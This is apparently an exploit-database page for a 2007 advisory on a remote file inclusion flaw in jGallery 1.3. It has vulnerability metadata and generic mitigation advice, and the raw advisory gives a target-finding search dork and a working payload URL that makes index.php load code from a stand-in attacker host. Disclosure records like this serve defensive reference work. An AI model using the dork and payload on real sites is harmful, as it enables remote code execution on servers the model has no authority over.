header-logo
Suggest Exploit
vendor:
jGallery
by:
Dj7xpl / Dj7xpl@Yahoo.com
7.5
CVSS
HIGH
Remote File Inclusion Vulnerability
Not specified
CWE
Product Name: jGallery
Affected Version From: Not specified
Affected Version To: Not specified
Patch Exists: NO
Related CWE: Not specified
CPE: Not specified
Metasploit:
Other Scripts:
Platforms Tested: Not specified
Not specified

jGallery 1.3 Remote File Inclusion Vulnerability

This vulnerability allows an attacker to include remote files and execute arbitrary code on the target system. It can be exploited by using a specially crafted URL to include a malicious file.

Mitigation:

Apply the latest patches and updates from the vendor. Ensure that input validation is performed on user-supplied data.
Source

Exploit-DB raw data:

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
+                                                                                                                  +
+                                                  Y! Underground Team                                             +
+                                                                                                                  +
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
+                                                                                                                  +
+          Portal......:  jGallery 1.3                                                                             +
+          Author......:  Dj7xpl / Dj7xpl@Yahoo.com                                                                +
+          Type........:  Remote File Inclusion Vulnerability                                                      +
+          Dork........:  intitle:"jGallery"                                                                       +
+          Download....:  http://portal.kooijman-design.nl/jGallery/README.html                                    +
+          Page........:  http://Dj7xpl.2600.ir                                                                    +
+                                                                                                                  +
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
+                                                                                                                  +
+          Bug.........:  http://[Target]/[Path]/index.php?G_JGALL[inc_path]=http://[EvilSite]/Evil.txt%00         +
+                                                                                                                  +
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

# milw0rm.com [2007-04-18]

Navigation

Suggest Exploit

Services By CQR